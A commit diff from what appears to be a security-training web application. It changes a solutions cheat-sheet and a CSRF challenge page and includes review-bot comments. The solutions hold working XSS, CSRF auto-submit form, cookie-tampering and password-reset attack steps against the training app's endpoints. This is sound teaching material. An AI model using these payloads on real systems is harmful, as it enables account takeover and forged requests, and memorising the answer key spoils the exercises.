Merge branch 'dev' into csrf_adjustments
ismisepaul committed Apr 17, 2022
2 parents 73c2421 + d2ac006 commit 3c3f642
Showing 2 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion src/main/resources/i18n/cheatsheets/solutions.properties
Expand Up @@ -2,7 +2,7 @@
453d22238401e0bf6f1ff5d45996407e98e45b07.solution = To complete the lesson, the attack string is the following:<br/>&quot;https://hostname:port/root/grantComplete/csrfLesson?userId=tempId&quot;
cd7f70faed73d2457219b951e714ebe5775515d8.solution = Input is being filtered. To complete this challenge, enter the following attack string: <br/>&lt;iframe src=&#39;#&#39; onload=&#39;alert(&quot;XSS&quot;)&#39;&gt;&lt;/iframe&gt
2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution = The user Ids in this challenge follow a sequence 1,3,5 etc. The Hidden Users ID is 11
94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge2&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userid&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge2&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.
94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge2&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userId&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge2&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.
b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution = Use the login function with usernames like admin, administrator, root, etc to find administrator email accounts. Use the forgotten password functionality to change the password for the email address recovered. Inspect the response of the password reset request to see what the password was reset to. Use this password to login!
a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution = Base 64 Decode the &quot;checksum&quot; cookie in the request to find it equals &quot;userRole=user&quot;. Change the value of userRole to be administrator instead. The cookies new value should be &quot;dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==&quot; when you replace it.
5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution = To complete this challenge, you must force an admin to submit a post request. The easiest way to achieve this is to force the admin to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge3&quot; action=&quot;https://hostname:port/user/csrfchallengethree/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userid&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;csrfToken&quot; value=&quot;anythingExceptNull&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge3&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the admin to visit this attack page.
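Review bot: the 5ca9115f3279b9b9f3308eb6a59a4fcd374846d6 entry (csrfchallengethree), three lines below the changed line, still posts `name="userid"` in its example form, while this change corrects the csrfchallengetwo form to `userId` and the lesson entry at the top of the hunk uses `userId=tempId`. If the challenge three endpoint reads the parameter under the same case-sensitive name, that solution text has the same defect the old challenge two text had; check the servlet and fix the entry in this commit if so. Minor: the cd7f70faed73d2457219b951e714ebe5775515d8 entry ends in `&lt;/iframe&gt` with no terminating semicolon on the last entity.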
Expand Up @@ -84,7 +84,7 @@
<%= bundle.getString("challenge.intro") %>
<br /> <br /> <a> POST /user/csrfchallengetwo/plusplus</a> <br />
<%= bundle.getString("challenge.withThisParameter") %>
<a>userId = <%= bundle.getString("challenge.userIdExample") %></a> <br />
userId = <a><%= userId %></a> <br />
<br />
<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>&nbsp;<%= bundle.getString("challenge.userIdExample") %>&nbsp;<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>&nbsp;
<br /> <br />
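Review bot: the added line writes `<%= userId %>` straight into the page, and nothing in this hunk shows where `userId` is assigned or that it is HTML-encoded before output. Since the value now comes from a variable rather than a resource-bundle string, confirm it is taken from the authenticated session and encode it at the point of output, so the page does not reflect an unescaped value. The sentence two lines below still interpolates `challenge.userIdExample`, so the page now shows the real id in one place and the placeholder in the next; say whether that mix is intended.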